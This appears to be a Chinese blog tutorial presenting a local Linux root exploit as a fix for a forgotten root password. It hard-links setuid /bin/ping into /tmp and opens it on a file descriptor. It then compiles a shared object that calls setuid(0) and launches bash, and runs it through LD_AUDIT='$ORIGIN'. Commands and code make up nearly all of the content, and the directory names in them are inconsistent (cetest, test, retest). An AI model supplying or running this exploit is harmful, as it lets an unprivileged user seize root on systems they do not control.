提权学习：Linux普通用户提权为root

---

当你的才华

还撑不起你的野心时

那你就应该静下心来学习

---

目录

Linux普通用户提权为root

接下来直接看实例

---

 

Linux普通用户提权为root

      我记得我以前用Linux的时候，忘记root密码是常有的事情，很多时候大家都会选择重启系统，进入单用户模式重置root密码，但在实际运维工作中，就未必能任性重启了。

      分享一个不必重启也能切换至root用户的方法给大家。

接下来直接看实例

1. 查看系统环境

cat  /etc/centos-release

2. 创建普通用户进行权限测试

useradd ce
su ce
cat  /etc/shadow

3. 开始提权操作

利用ping命令的suid特性，创建一个链接。(ln  /bin/ping   /tmp/cetest/target)

ll  /tmp/   -d
cd  /tmp/
mkdir  cetest                     //创建目录
ll  /bin/ping                         
ln  /bin/ping   /tmp/cetest/target   //利用ping命令的suid特性，创建一个链接
ll   /tmp/test/target
exec  3<  /tmp/cetest/target      //调用命令
rm  -rf  /tmp/retest            

4. 创建一个C程序

创建vim test.c  

void __attribute__((constructor)) init()  
{  
   setuid(0);  
   system("/bin/bash");  
}  

5. 编译C程序

gcc -w -fPIC -shared -o /tmp/root test.c  
LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3  

注：执行程序后，会出现一个报错，但不用管，此时应该顺利切换至root用户了。

 

---

我不需要自由，只想背着她的梦

一步步向前走，她给的永远不重

---